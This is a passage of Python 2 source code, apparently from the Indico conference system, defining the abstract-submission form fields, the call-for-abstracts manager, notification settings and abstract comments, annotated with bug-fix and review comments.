    """Author index restricted to the primary authors of each abstract."""

    def __init__(self, mgr):
        _AuthIdx.__init__(self, mgr)
        # Build the index from scratch over all current abstracts.
        for abstract in self._mgr.getAbstractList():
            for author in abstract.getPrimaryAuthorList():
                self.index(author)
class _AuthEmailIdx(_AuthIdx):
    """Author index keyed by e-mail address (primary and co-authors)."""

    def __init__(self, mgr):
        _AuthIdx.__init__(self, mgr)
        # Build the index from scratch over all current abstracts.
        for abstract in self._mgr.getAbstractList():
            for author in abstract.getPrimaryAuthorList():
                self.index(author)
            for author in abstract.getCoAuthorList():
                self.index(author)

    def _getKey(self, auth):
        # Key by lower-cased e-mail instead of the default name key.
        return auth.getEmail().lower()
class AbstractField(Persistent, Fossilizable):
    """Base class for the configurable fields of the abstract submission form.

    Concrete subclasses are created through the makefield() factory.
    """
    fossilizes(IAbstractFieldFossil)

    fieldtypes = ["textarea", "input", "selection"]

    @classmethod
    def makefield(cls, params):
        """Factory returning the concrete field object for params["type"].

        Unknown types deliberately fall back to a plain text area.
        """
        fieldType = params["type"]
        if fieldType not in cls.fieldtypes:
            return AbstractTextAreaField(params)
        elif fieldType == "textarea":
            return AbstractTextAreaField(params)
        elif fieldType == "input":
            return AbstractInputField(params)
        elif fieldType == "selection":
            return AbstractSelectionField(params)

    def __init__(self, params):
        self._id = params["id"]
        # Fall back to the id when no (truthy) caption is supplied.
        self._caption = params.get("caption") or self._id
        self._isMandatory = params.get("isMandatory") or False
        self._active = True

    def clone(self):
        """To be implemented by subclasses."""
        pass

    def _notifyModification(self):
        # Mark the persistent object as dirty so ZODB stores the change.
        self._p_changed = 1

    def check(self, content):
        """Return a list of error messages for the submitted *content*."""
        errors = []
        if self._active and self._isMandatory and content == "":
            errors.append(_("The field '%s' is mandatory") % self._caption)
        return errors

    def getType(self):
        return self._type

    def isMandatory(self):
        return self._isMandatory

    def setMandatory(self, isMandatory=False):
        self._isMandatory = isMandatory
        self._notifyModification()

    def getId(self):
        return self._id

    def setId(self, id):
        self._id = id
        self._notifyModification()

    def getCaption(self):
        return self._caption

    def setCaption(self, caption):
        self._caption = caption
        self._notifyModification()

    def isActive(self):
        return self._active

    def setActive(self, active):
        self._active = active
        self._notifyModification()

    def getValues(self):
        """Return the field configuration as a plain dict."""
        # BUG FIX: "values" used to be initialised as a list, which made the
        # keyed assignments below raise a TypeError.
        values = {}
        values["id"] = self.getId()
        values["caption"] = self.getCaption()
        values["isMandatory"] = self.isMandatory()
        return values

    def setValues(self, params):
        """Update the field configuration from a dict (see getValues())."""
        self.setCaption(params.get("caption") or self._id)
        self.setMandatory(params.get("isMandatory") or False)
        self._notifyModification()
class AbstractTextField(AbstractField):
    """Free-text field with an optional length limit in characters or words."""
    fossilizes(IAbstractTextFieldFossil)

    limitationtypes = ["chars", "words"]

    def __init__(self, params):
        AbstractField.__init__(self, params)
        self._maxLength = params.get("maxLength") or 0
        limitation = params.get("limitation")
        self._limitation = limitation if limitation in self.limitationtypes else "chars"

    def clone(self):
        return AbstractTextField(self.getValues())

    def check(self, content):
        """Validate *content* against the base checks and the length limit."""
        errors = AbstractField.check(self, content)
        limit = self._maxLength
        if limit != 0:
            if self._limitation == "words" and wordsCounter(str(content)) > limit:
                errors.append(_("The field '%s' cannot be more than %s words") % (self._caption, limit))
            elif self._limitation == "chars" and len(content) > limit:
                errors.append(_("The field '%s' cannot be more than %s characters") % (self._caption, limit))
        return errors

    def getLimitation(self):
        return self._limitation

    def getMaxLength(self):
        return self._maxLength

    def setLimitation(self, limitation="chars"):
        # Anything outside limitationtypes silently falls back to "chars".
        self._limitation = limitation if limitation in self.limitationtypes else "chars"
        self._notifyModification()

    def setMaxLength(self, maxLength=0):
        self._maxLength = maxLength
        self._notifyModification()

    def getValues(self):
        values = AbstractField.getValues(self)
        values["maxLength"] = self.getMaxLength()
        values["limitation"] = self.getLimitation()
        return values

    def setValues(self, params):
        AbstractField.setValues(self, params)
        self.setMaxLength(params.get("maxLength") or 0)
        limitation = params.get("limitation")
        self.setLimitation(limitation if limitation in self.limitationtypes else "chars")
        self._notifyModification()
class AbstractTextAreaField(AbstractTextField):
    """Multi-line (textarea) text field."""
    # Removed a redundant "pass" statement; the class body is non-empty.
    _type = "textarea"
class AbstractInputField(AbstractTextField):
    """Single-line (input) text field."""
    # Removed a redundant "pass" statement; the class body is non-empty.
    _type = "input"
class AbstractSelectionField(AbstractField):
    """A field whose value is picked from a configurable list of options.

    Options removed from the configuration are kept in a separate "deleted"
    list so abstracts that referenced them can still resolve the option.
    """
    fossilizes(IAbstractSelectionFieldFossil)

    _type = "selection"

    def __init__(self, params):
        AbstractField.__init__(self, params)
        self.__id_generator = Counter()
        self._options = []
        self._deleted_options = []
        for o in params.get("options") or []:
            self._setOption(o)

    def _deleteOption(self, option):
        # Move the option from the active list to the deleted list.
        self._options.remove(option)
        self._deleted_options.append(option)

    def _updateDeletedOptions(self, options=None):
        """Delete every stored option that does not appear in *options*."""
        # BUG FIX: mutable default argument ([]) replaced with None.
        stored_options = set(self._options)
        updated_options = set(self.getOption(o["id"]) for o in (options or []))
        for deleted_option in stored_options - updated_options:
            self._deleteOption(deleted_option)

    def _setOption(self, option, index=None):
        """Update an existing option (moving it to *index*) or append a new one."""
        stored = self.getOption(option["id"])
        if stored:
            stored.value = option["value"]
            oldindex = self._options.index(stored)
            self._options.insert(index, self._options.pop(oldindex))
        # BUG FIX: this comparison used "is not", which only worked thanks to
        # CPython string interning; use a value comparison.
        elif option["value"] != "":
            option["id"] = self.__id_generator.newCount()
            self._options.append(SelectionFieldOption(option["id"], option["value"]))

    def clone(self):
        return AbstractSelectionField(self.getValues())

    def check(self, content):
        """Validate that *content* is empty or one of the configured option ids."""
        errors = AbstractField.check(self, content)
        # BUG FIX: the mandatory/empty case is already reported by the base
        # class check(); a duplicate of the same message used to be appended
        # here.
        if content != "":
            if next((op for op in self._options if op.id == content), None) is None:
                errors.append(_("The option with ID '%s' in the field %s") % (content, self._caption))
        return errors

    def getDeletedOption(self, id):
        return next((o for o in self._deleted_options if o.getId() == id), None)

    def getDeletedOptions(self, id):
        # NOTE(review): the "id" parameter is unused; kept for interface
        # compatibility with existing callers.
        return self._deleted_options

    def getOption(self, id):
        return next((o for o in self._options if o.getId() == id), None)

    def getOptions(self):
        return self._options

    def setOptions(self, options=None):
        """Replace the option list; options missing from *options* are deleted."""
        # BUG FIX: mutable default argument replaced; also tolerate None
        # (setValues() passes params.get("options"), which may be None).
        options = options or []
        self._updateDeletedOptions(options)
        for i, o in enumerate(options):
            self._setOption(o, i)
        self._notifyModification()

    def getValues(self):
        values = AbstractField.getValues(self)
        options = []
        for o in self._options:
            options.append(o.__dict__)
        values["options"] = options
        return values

    def setValues(self, params):
        AbstractField.setValues(self, params)
        self.setOptions(params.get("options"))
        self._notifyModification()
class SelectionFieldOption(Fossilizable):
    """One selectable option of an AbstractSelectionField.

    Options compare equal (and hash) by id only.
    """
    fossilizes(ISelectionFieldOptionFossil)

    def __init__(self, id, value):
        self.id = id
        self.value = value
        self.deleted = False

    def __eq__(self, other):
        return isinstance(other, SelectionFieldOption) and self.id == other.id

    def __hash__(self):
        return hash(self.id)

    def __repr__(self):
        return self.id

    def __str__(self):
        return self.value

    def getValue(self):
        return self.value

    def getId(self):
        return self.id

    def isDeleted(self):
        return self.deleted
class AbstractFieldContent(Persistent):
    """The value a submitter entered for one abstract field.

    Compares equal either to another AbstractFieldContent of the same field
    or directly to a raw value.
    """

    def __init__(self, field, value):
        self.field = field
        self.value = value

    def __eq__(self, other):
        if isinstance(other, AbstractFieldContent):
            # Contents of different fields never compare equal.
            return self.field == other.field and self.value == other.value
        return self.value == other

    def __len__(self):
        return len(self.value)

    def __ne__(self, other):
        if isinstance(other, AbstractFieldContent):
            return self.field != other.field or self.value != other.value
        return self.value != other

    def __str__(self):
        # Selection fields store the option id; render the option itself.
        if isinstance(self.field, AbstractSelectionField):
            return str(self.field.getOption(self.value))
        return str(self.value)
class AbstractFieldsMgr(Persistent):
    """Manages the ordered list of configurable abstract-submission fields.

    Two fields ("content" and "summary") are created by default; "content"
    is re-created on demand if it ever goes missing (see getFields()).
    """
    def __init__(self):
        self._fields = self._initFields()
        self.__fieldGenerator = Counter()
    def clone(self):
        # Deep-copy the manager by cloning every field.
        afm = AbstractFieldsMgr()
        for f in self.getFields():
            afm._addField(f.clone())
        return afm
    def getFieldGenerator(self):
        # Lazy creation for instances persisted before the generator existed.
        try:
            if self.__fieldGenerator:
                pass
        except AttributeError, e:
            self.__fieldGenerator = Counter()
        return self.__fieldGenerator
    def _notifyModification(self):
        # Mark the persistent object as dirty so ZODB stores the change.
        self._p_changed = 1
    def _initFields(self):
        # Default field set: mandatory "content" plus optional "summary".
        d = []
        params = {"type": "textarea", "id": "content", "caption": N_("Content"), "isMandatory": True}
        d.append(AbstractField.makefield(params))
        params = {"type": "textarea", "id": "summary", "caption": N_("Summary")}
        d.append(AbstractField.makefield(params))
        return d
    def hasField(self, id):
        for f in self._fields:
            if f.getId() == id:
                return True
        return False
    def getFields(self):
        # Self-heal: the "content" field must always exist, at position 0.
        if not self.hasField("content"):
            params = {"type": "textarea", "id": "content", "caption": _("Content"), "isMandatory": True}
            ac = AbstractField.makefield(params)
            self._fields.insert(0, ac)
        return self._fields
    def getActiveFields(self):
        fl = []
        for f in self.getFields():
            if f.isActive():
                fl.append(f)
        return fl
    def hasActiveField(self, id):
        return self.hasField(id) and self.getFieldById(id).isActive()
    def hasAnyActiveField(self):
        for f in self._fields:
            if f.isActive():
                return True
        return False
    def enableField(self, id):
        if self.hasField(id):
            self.getFieldById(id).setActive(True)
            self._notifyModification()
    def disableField(self, id):
        if self.hasField(id):
            self.getFieldById(id).setActive(False)
            self._notifyModification()
    def getFieldKeys(self):
        # Field ids, in display order.
        keys = []
        for f in self._fields:
            keys.append(f.getId())
        return keys
    def getFieldById(self, id):
        for f in self._fields:
            if f.getId() == id:
                return f
        return None
    def _addField(self, field):
        self._fields.append(field)
    def setField(self, params):
        # Update an existing field or create a new one with a generated id.
        # Returns the id of the affected field.
        if self.hasField(params["id"]):
            self.getFieldById(params["id"]).setValues(params)
        else:
            params["id"] = str(self.getFieldGenerator().newCount())
            absf = AbstractField.makefield(params)
            self._fields.append(absf)
        self._notifyModification()
        return params["id"]
    def removeField(self, id):
        if self.hasField(id):
            self._fields.remove(self.getFieldById(id))
            self._notifyModification()
    def moveAbsFieldUp(self, id):
        # Move the field one position up; the first field wraps to the end.
        if self.hasField(id):
            f = self.getFieldById(id)
            idx = self._fields.index(f)
            self._fields.remove(f)
            if idx == 0:
                self._fields.append(f)
            else:
                self._fields.insert(idx-1, f)
            self._notifyModification()
    def moveAbsFieldDown(self, id):
        # Move the field one position down; the last field wraps to the front.
        if self.hasField(id):
            f = self.getFieldById(id)
            idx = self._fields.index(f)
            self._fields.remove(f)
            if idx == len(self._fields):
                self._fields.insert(0, f)
            else:
                self._fields.insert(idx+1, f)
            self._notifyModification()
class AbstractMgr(Persistent):
    """Call-for-abstracts (CFA) manager of a conference.

    Owns the abstracts, the submission-form field configuration, the
    notification templates and the author/participation indexes.  Many
    accessors use the legacy "try/except AttributeError" idiom to lazily
    create attributes on instances persisted before the attribute existed;
    bare "except:" clauses in those spots have been narrowed to
    AttributeError throughout this class.
    """
    def __init__(self, owner):
        self._owner = owner
        self._abstracts = OOBTree()
        self._participationIdx = _AbstractParticipationIndex()
        self.__abstractGenerator = Counter()
        self._activated = False
        self.setStartSubmissionDate(datetime.now())
        self.setEndSubmissionDate(datetime.now())
##        self._contribTypes = PersistentList()
        self.setAnnouncement("")
        self._notifTpls = IOBTree()
        self._notifTplsOrder = PersistentList()
        self.__notifTplsCounter = Counter()
        self._authorizedSubmitter = PersistentList()
        self._primAuthIdx = _PrimAuthIdx(self)
        self._authEmailIdx = _AuthEmailIdx(self)
        self._abstractFieldsMgr = AbstractFieldsMgr()
        self._submissionNotification = SubmissionNotification()
        self._multipleTracks = True
        self._tracksMandatory = False
        self._attachFiles = False
        self._showSelectAsSpeaker = True
        self._selectSpeakerMandatory = True
        self._showAttachedFilesContribList = False
    def getMultipleTracks(self):
        try:
            return self._multipleTracks
        except AttributeError:
            self.setMultipleTracks(True)
            return self._multipleTracks
    def setMultipleTracks(self, multipleTracks=True):
        self._multipleTracks = multipleTracks
    def areTracksMandatory(self):
        try:
            return self._tracksMandatory
        except AttributeError:
            self.setTracksMandatory(False)
            return self._tracksMandatory
    def canAttachFiles(self):
        try:
            return self._attachFiles
        except AttributeError:
            self.setAllowAttachFiles(False)
            return self._attachFiles
    def setAllowAttachFiles(self, attachedFiles):
        self._attachFiles = attachedFiles
    def setTracksMandatory(self, tracksMandatory=False):
        self._tracksMandatory = tracksMandatory
    def showSelectAsSpeaker(self):
        try:
            return self._showSelectAsSpeaker
        except AttributeError:
            self._showSelectAsSpeaker = True
            return self._showSelectAsSpeaker
    def setShowSelectAsSpeaker(self, showSelectAsSpeaker):
        self._showSelectAsSpeaker = showSelectAsSpeaker
    def isSelectSpeakerMandatory(self):
        try:
            return self._selectSpeakerMandatory
        except AttributeError:
            self._selectSpeakerMandatory = True
            return self._selectSpeakerMandatory
    def setSelectSpeakerMandatory(self, selectSpeakerMandatory):
        self._selectSpeakerMandatory = selectSpeakerMandatory
    def showAttachedFilesContribList(self):
        try:
            return self._showAttachedFilesContribList
        except AttributeError:
            self._showAttachedFilesContribList = False
            return self._showAttachedFilesContribList
    def setSwitchShowAttachedFilesContribList(self, showshowAttachedFilesContribList):
        self._showAttachedFilesContribList = showshowAttachedFilesContribList
    def getAbstractFieldsMgr(self):
        try:
            return self._abstractFieldsMgr
        except AttributeError:
            self._abstractFieldsMgr = AbstractFieldsMgr()
            return self._abstractFieldsMgr
    def clone(self, conference):
        """Return a copy of this manager attached to *conference*, shifting
        all dates by the difference between the two conferences' start dates."""
        amgr = AbstractMgr(conference)
        amgr._abstractFieldsMgr = self.getAbstractFieldsMgr().clone()
        amgr.setAnnouncement(self.getAnnouncement())
        timeDifference = conference.getStartDate() - self.getOwner().getStartDate()
        amgr.setStartSubmissionDate(self.getStartSubmissionDate() + timeDifference)
        amgr.setEndSubmissionDate(self.getEndSubmissionDate() + timeDifference)
        modifDeadline = self.getModificationDeadline()
        if modifDeadline is not None:
            amgr.setModificationDeadline(self.getModificationDeadline() + timeDifference)
        amgr.setActive(self.isActive())
        if self.getCFAStatus():
            amgr.activeCFA()
        else:
            amgr.desactiveCFA()
        for a in self.getAbstractList():
            amgr.addAbstract(a.clone(conference, amgr._generateNewAbstractId()))
        for tpl in self.getNotificationTplList():
            amgr.addNotificationTpl(tpl.clone())
        # Cloning submission notification:
        amgr.setSubmissionNotification(self.getSubmissionNotification().clone())
        return amgr
    def getOwner(self):
        return self._owner
    getConference = getOwner
    def getTimezone(self):
        return self.getConference().getTimezone()
    def activeCFA(self):
        self._activated = True
    def desactiveCFA(self):
        self._activated = False
    def getAuthorizedSubmitterList(self):
        try:
            return self._authorizedSubmitter
        except AttributeError:
            self._authorizedSubmitter = PersistentList()
            return self._authorizedSubmitter
    def addAuthorizedSubmitter(self, av):
        try:
            if self._authorizedSubmitter:
                pass
        except AttributeError:
            self._authorizedSubmitter = PersistentList()
        if not av in self._authorizedSubmitter:
            self._authorizedSubmitter.append(av)
    def removeAuthorizedSubmitter(self, av):
        try:
            if self._authorizedSubmitter:
                pass
        except AttributeError:
            self._authorizedSubmitter = PersistentList()
        if av in self._authorizedSubmitter:
            self._authorizedSubmitter.remove(av)
    def getCFAStatus(self):
        return self._activated
    def setActive(self, value):
        if value:
            self.activeCFA()
        else:
            self.desactiveCFA()
    def isActive(self):
        return self._activated
    def setStartSubmissionDate(self, date):
        # Submission opens at the very start of the given day (naive datetime).
        self._submissionStartDate = datetime(date.year, date.month, date.day, 0, 0, 0)
    def getStartSubmissionDate(self):
        return timezone(self.getTimezone()).localize(self._submissionStartDate)
    def setEndSubmissionDate(self, date):
        # Submission closes at the very end of the given day (naive datetime).
        self._submissionEndDate = datetime(date.year, date.month, date.day, 23, 59, 59)
    def getEndSubmissionDate(self):
        return timezone(self.getTimezone()).localize(self._submissionEndDate)
    def inSubmissionPeriod(self, date=None):
        if date is None:
            date = nowutc()
        sd = self.getStartSubmissionDate()
        ed = self.getEndSubmissionDate()
        return date <= ed and date >= sd
    def getModificationDeadline(self):
        """Returns the deadline for modifications on the submitted abstracts.
        """
        try:
            if self._modifDeadline:
                pass
        except AttributeError:
            self._modifDeadline = None
        if self._modifDeadline is not None:
            return timezone(self.getTimezone()).localize(self._modifDeadline)
        else:
            return None
    def setModificationDeadline(self, newDL):
        """Sets a new deadline for modifications on the submitted abstracts.
        """
        if newDL is not None:
            self._modifDeadline = datetime(newDL.year, newDL.month, newDL.day, 23, 59, 59)
        else:
            self._modifDeadline = newDL
    def inModificationPeriod(self, date=None):
        """Tells whether is possible to modify a submitted abstract in a
        certain date.
        """
        if date is None:
            date = nowutc()
        if not self.getModificationDeadline():
            return True
        return date <= self.getModificationDeadline()
    def getAnnouncement(self):
        #to be removed
        try:
            if self._announcement:
                pass
        except AttributeError:
            self._announcement = ""
        return self._announcement
    def setAnnouncement(self, newAnnouncement):
        self._announcement = newAnnouncement.strip()
##    def addContribType(self, type):
##        type = type.strip()
##        if type == "":
##            raise MaKaCError("Cannot add an empty contribution type")
##        self._contribTypes.append(type)
##
##    def removeContribType(self, type):
##        if type in self._contribTypes:
##            self._contribTypes.remove(type)
##
##    def getContribTypeList(self):
##        return self._contribTypes
    def _generateNewAbstractId(self):
        """Returns a new unique identifier for the current conference
        contributions
        """
        #instead of having a own counter, the abstract manager will request
        # abstract ids to the conference which will ensure a unique id
        # which will persist afterwards when an abstract is accepted
        return str(self.getConference().genNewAbstractId())
    def _getOldAbstractCounter(self):
        return self.__abstractGenerator._getCount()
    def newAbstract(self, av, **data):
        """Creates a new abstract under this manager
        """
        id = self._generateNewAbstractId()
        a = Abstract(self, id, av, **data)
        self._abstracts[id] = a
        for auth in a.getPrimaryAuthorList():
            self.indexAuthor(auth)
        return a
    def addAbstract(self, abstract):
        if abstract in self.getAbstractList():
            return
        if isinstance(abstract.getCurrentStatus(), AbstractStatusWithdrawn):
            raise MaKaCError(_("Cannot add an abstract which has been withdrawn"), ("Event"))
        abstract._setOwner(self)
        self._abstracts[abstract.getId()] = abstract
        for auth in abstract.getPrimaryAuthorList():
            self.indexAuthor(auth)
    def removeAbstract(self, abstract):
        # Modernised: "in" instead of the deprecated has_key().
        if abstract.getId() in self._abstracts:
            #for auth in abstract.getPrimaryAuthorList():
            #    self.unindexAuthor(auth)
            # * Remove dependencies with another abstracts:
            #       - If it's an accepted abstract-->remove abstract from contribution
            if isinstance(abstract.getCurrentStatus(), AbstractStatusAccepted):
                raise NoReportError(_("Cannot remove an accepted abstract before removing the contribution linked to it"))
            # If it's a withdrawn abstract-->remove abstract from contribution
            if isinstance(abstract.getCurrentStatus(), AbstractStatusWithdrawn) and abstract.getContribution():
                raise NoReportError(_("Cannot remove the abstract before removing the contribution linked to it"))
            for abs in self._abstracts.values():
                if abs != abstract:
                    st = abs.getCurrentStatus()
                    if isinstance(st, AbstractStatusDuplicated):
                        #if the abstract to delete is the orginal in another "duplicated", change status to submitted
                        if st.getOriginal() == abstract:
                            abs.setCurrentStatus(AbstractStatusSubmitted(abs))
                    elif isinstance(st, AbstractStatusMerged):
                        #if the abstract to delete is the target one in another "merged", change status to submitted
                        if st.getTargetAbstract() == abstract:
                            abs.setCurrentStatus(AbstractStatusSubmitted(abs))
            #unindex participations!!!
            self.unregisterParticipation(abstract.getSubmitter())
            del self._abstracts[abstract.getId()]
            abstract.delete()
    def recoverAbstract(self, abstract):
        self.addAbstract(abstract)
        abstract.recoverFromTrashCan()
    def getAbstractList(self):
        return self._abstracts.values()
    def getAbstractById(self, id):
        return self._abstracts.get(str(id), None)
    def registerParticipation(self, p):
        self._participationIdx.index(p)
    def unregisterParticipation(self, p):
        self._participationIdx.unindex(p)
    def getAbstractListForAvatar(self, av):
        try:
            if self._participationIdx:
                pass
        except AttributeError:
            # Legacy migration: recover the index stored under a misspelled
            # attribute name in old instances.
            self._participationIdx = self._partipationIdx
            self._partipationIdx = None
        res = []
        for participation in self._participationIdx.getParticipationList(av):
            abstract = participation.getAbstract()
            if abstract is not None and abstract.isSubmitter(av):
                if abstract not in res:
                    res.append(abstract)
        return res
    def getAbstractListForAuthorEmail(self, email):
        """ Get list of abstracts where the email belongs to an author"""
        return [self.getAbstractById(i) for i in self._getAuthEmailIndex().match(email)]
    def getNotificationTplList(self):
        try:
            if self._notifTpls:
                pass
        except AttributeError:
            self._notifTpls = IOBTree()
        try:
            if self._notifTplsOrder:
                pass
        except AttributeError:
            self._notifTplsOrder = PersistentList()
            for tpl in self._notifTpls.values():
                self._notifTplsOrder.append(tpl)
        return self._notifTplsOrder
    def addNotificationTpl(self, tpl):
        try:
            if self._notifTpls:
                pass
        except AttributeError:
            self._notifTpls = IOBTree()
        try:
            if self._notifTplsOrder:
                pass
        except AttributeError:
            self._notifTplsOrder = PersistentList()
            # BUG FIX: the migration loop used to reuse the name "tpl",
            # clobbering the method argument.
            for t in self._notifTpls.values():
                self._notifTplsOrder.append(t)
        try:
            if self._notifTplsCounter:
                pass
        except AttributeError:
            self._notifTplsCounter = Counter()
        if tpl.getOwner() == self and tpl.getId() in self._notifTpls:
            return
        id = tpl.getId()
        if id == "":
            id = self._notifTplsCounter.newCount()
        tpl.includeInOwner(self, id)
        self._notifTpls[int(id)] = tpl
        self._notifTplsOrder.append(tpl)
    def removeNotificationTpl(self, tpl):
        try:
            if self._notifTpls:
                pass
        except AttributeError:
            self._notifTpls = IOBTree()
        try:
            if self._notifTplsOrder:
                pass
        except AttributeError:
            self._notifTplsOrder = PersistentList()
            # BUG FIX: same argument-shadowing problem as in addNotificationTpl.
            for t in self._notifTpls.values():
                self._notifTplsOrder.append(t)
        if tpl.getOwner() != self or int(tpl.getId()) not in self._notifTpls:
            return
        del self._notifTpls[int(tpl.getId())]
        self._notifTplsOrder.remove(tpl)
        tpl.includeInOwner(None, tpl.getId()) # We don't change the id for
                                              # recovery purposes.
        tpl.delete()
    def recoverNotificationTpl(self, tpl):
        self.addNotificationTpl(tpl)
        tpl.recover()
    def getNotificationTplById(self, id):
        try:
            if self._notifTpls:
                pass
        except AttributeError:
            self._notifTpls = IOBTree()
        return self._notifTpls.get(int(id), None)
    def getNotifTplForAbstract(self, abs):
        """Return the first template whose condition matches *abs*, or None."""
        for tpl in self.getNotificationTplList():
            if tpl.satisfies(abs):
                return tpl
        return None
    def moveUpNotifTpl(self, tpl):
        """Move a notification template one position up (no-op at the top)."""
        try:
            if self._notifTplsOrder:
                pass
        except AttributeError:
            self._notifTplsOrder = PersistentList()
            # BUG FIX: the migration loop used to reuse the name "tpl",
            # clobbering the method argument.
            for t in self._notifTpls.values():
                self._notifTplsOrder.append(t)
        if tpl not in self._notifTplsOrder:
            return
        idx = self._notifTplsOrder.index(tpl)
        if idx == 0:
            return
        self._notifTplsOrder.remove(tpl)
        self._notifTplsOrder.insert(idx-1, tpl)
    def moveDownNotifTpl(self, tpl):
        """Move a notification template one position down (no-op at the bottom)."""
        try:
            if self._notifTplsOrder:
                pass
        except AttributeError:
            self._notifTplsOrder = PersistentList()
            # BUG FIX: same argument-shadowing problem as in moveUpNotifTpl.
            for t in self._notifTpls.values():
                self._notifTplsOrder.append(t)
        # Robustness fix (mirrors moveUpNotifTpl): ignore templates that are
        # not in the order list instead of raising ValueError from index().
        if tpl not in self._notifTplsOrder:
            return
        idx = self._notifTplsOrder.index(tpl)
        if idx == len(self._notifTplsOrder):
            return
        self._notifTplsOrder.remove(tpl)
        self._notifTplsOrder.insert(idx+1, tpl)
    def indexAuthor(self, auth):
        a = auth.getAbstract()
        if a.isPrimaryAuthor(auth):
            self._getPrimAuthIndex().index(auth)
        self._getAuthEmailIndex().index(auth)
    def unindexAuthor(self, auth):
        a = auth.getAbstract()
        if a.isPrimaryAuthor(auth):
            self._getPrimAuthIndex().unindex(auth)
        self._getAuthEmailIndex().unindex(auth)
    def _getPrimAuthIndex(self):
        try:
            if self._primAuthIdx:
                pass
        except AttributeError:
            self._primAuthIdx = _PrimAuthIdx(self)
        return self._primAuthIdx
    def _getAuthEmailIndex(self):
        if not hasattr(self, '_authEmailIdx'):
            self._authEmailIdx = _AuthEmailIdx(self)
        return self._authEmailIdx
    def getAbstractsMatchingAuth(self, query, onlyPrimary=True):
        # NOTE(review): "onlyPrimary" is unused (the primary-author index is
        # always queried); kept for interface compatibility.
        if str(query).strip() == "":
            return self.getAbstractList()
        res = self._getPrimAuthIndex().match(query)
        return [self.getAbstractById(id) for id in res]
    def setAbstractField(self, params):
        return self.getAbstractFieldsMgr().setField(params)
    def removeAbstractField(self, id):
        self.getAbstractFieldsMgr().removeField(id)
    def hasAnyEnabledAbstractField(self):
        return self.getAbstractFieldsMgr().hasAnyActiveField()
    def hasEnabledAbstractField(self, key):
        return self.getAbstractFieldsMgr().hasActiveField(key)
    def enableAbstractField(self, abstractField):
        self.getAbstractFieldsMgr().enableField(abstractField)
        self.notifyModification()
    def disableAbstractField(self, abstractField):
        self.getAbstractFieldsMgr().disableField(abstractField)
        self.notifyModification()
    def moveAbsFieldUp(self, id):
        self.getAbstractFieldsMgr().moveAbsFieldUp(id)
        self.notifyModification()
    def moveAbsFieldDown(self, id):
        self.getAbstractFieldsMgr().moveAbsFieldDown(id)
        self.notifyModification()
    def getSubmissionNotification(self):
        try:
            if self._submissionNotification:
                pass
        except AttributeError:
            self._submissionNotification = SubmissionNotification()
        return self._submissionNotification
    def setSubmissionNotification(self, sn):
        self._submissionNotification = sn
    def recalculateAbstractsRating(self, scaleLower, scaleHigher):
        ''' recalculate the values of the rating for all the abstracts in the conference '''
        for abs in self.getAbstractList():
            abs.updateRating((scaleLower, scaleHigher))
    def removeAnswersOfQuestion(self, questionId):
        ''' Remove a question results for each abstract '''
        for abs in self.getAbstractList():
            abs.removeAnswersOfQuestion(questionId)
    def notifyModification(self):
        # Mark the persistent object as dirty so ZODB stores the change.
        self._p_changed = 1
class SubmissionNotification(Persistent):
    """Extra To/CC e-mail addresses notified when an abstract is submitted."""

    def __init__(self):
        self._toList = PersistentList()
        self._ccList = PersistentList()

    def hasDestination(self):
        """True when at least one To or CC address is configured."""
        # BUG FIX: the second operand used to re-test _toList, so CC-only
        # configurations were reported as having no destination.
        return self._toList != [] or self._ccList != []

    def getToList(self):
        return self._toList

    def setToList(self, tl):
        self._toList = tl

    def addToList(self, to):
        self._toList.append(to)

    def clearToList(self):
        self._toList = PersistentList()

    def getCCList(self):
        return self._ccList

    def setCCList(self, cl):
        self._ccList = cl

    def addCCList(self, cc):
        self._ccList.append(cc)

    def clearCCList(self):
        self._ccList = PersistentList()

    def clone(self):
        nsn = SubmissionNotification()
        for i in self.getToList():
            nsn.addToList(i)
        for i in self.getCCList():
            nsn.addCCList(i)
        return nsn
class Comment(Persistent):
    """An internal comment attached to an abstract."""

    def __init__(self, res, content=""):
        self._abstract = None
        self._id = ""
        self._responsible = res
        # BUG FIX: the "content" argument used to be discarded (the attribute
        # was always initialised to ""); honour it, keeping the same default.
        self._content = content
        self._creationDate = nowutc()
        self._modificationDate = nowutc()

    def getLocator(self):
        loc = self._abstract.getLocator()
        loc["intCommentId"] = self._id
        return loc

    def includeInAbstract(self, abstract, id):
        # Attach the comment to its abstract under the given id.
        self._abstract = abstract
        self._id = id

    def delete(self):
        # Detach and park in the trash can for possible recovery.
        self._abstract = None
        TrashCanManager().add(self)

    def recover(self):
        TrashCanManager().remove(self)

    def _notifyModification(self, dt=None):
        # Record the modification timestamp (defaults to "now", UTC).
        if dt:
            self._modificationDate = dt
        else:
            self._modificationDate = nowutc()

    def getResponsible(self):
        return self._responsible

    def getAbstract(self):
        return self._abstract

    def getId(self):
        return self._id

    def getContent(self):
        return self._content

    def setContent(self, newContent):
        self._content = newContent
        self._notifyModification()

    def getCreationDate(self):
        return self._creationDate

    def getModificationDate(self):
        return self._modificationDate

    def canModify(self, aw_or_user):
        # Accept either an access wrapper or a bare user object.
        if hasattr(aw_or_user, 'getUser'):
            aw_or_user = aw_or_user.getUser()
        return self.canUserModify(aw_or_user)

    def canUserModify(self, user):
        # Only the author of the comment may modify it, and only while the
        # user can still modify the abstract or coordinates one of its tracks.
        abstract = self.getAbstract()
        conf = abstract.getConference()
        # NOTE(review): "conf.getConference()" looks redundant since "conf" is
        # already the conference -- confirm before simplifying.
        return self.getResponsible() == user and \
            (abstract.canUserModify(user) or \
            len(conf.getConference().getCoordinatedTracks(user)) > 0)
class Abstract(Persistent):
    def __init__(self, owner, id, submitter, **abstractData):
        """Create an abstract under *owner* (an AbstractMgr) with the given id
        and submitter (an avatar).

        NOTE(review): **abstractData is accepted but not used here -- presumably
        consumed by callers/subclasses; confirm before removing.
        """
        self._setOwner( owner )
        self._setId( id )
        self._title = ""
        self._fields = {}
        self._authorGen = Counter()
        self._authors = OOBTree()
        self._primaryAuthors = PersistentList()
        self._coAuthors = PersistentList()
        self._speakers = PersistentList()
        self._tracks = OOBTree()
        self._contribTypes = PersistentList( [""] )
        self._setSubmissionDate( nowutc() )
        self._modificationDate = nowutc()
        # A freshly created abstract always starts in the "submitted" status.
        self._currentStatus = AbstractStatusSubmitted( self )
        self._trackAcceptances = OOBTree()
        self._trackRejections = OOBTree()
        self._trackReallocations = OOBTree()
        self._trackJudgementsHistorical={}
        self._comments = ""
        self._contribution = None
        self._intCommentGen=Counter()
        self._intComments=PersistentList()
        self._mergeFromList = PersistentList()
        self._notifLog=NotificationLog(self)
        self._submitter=None
        self._setSubmitter( submitter )
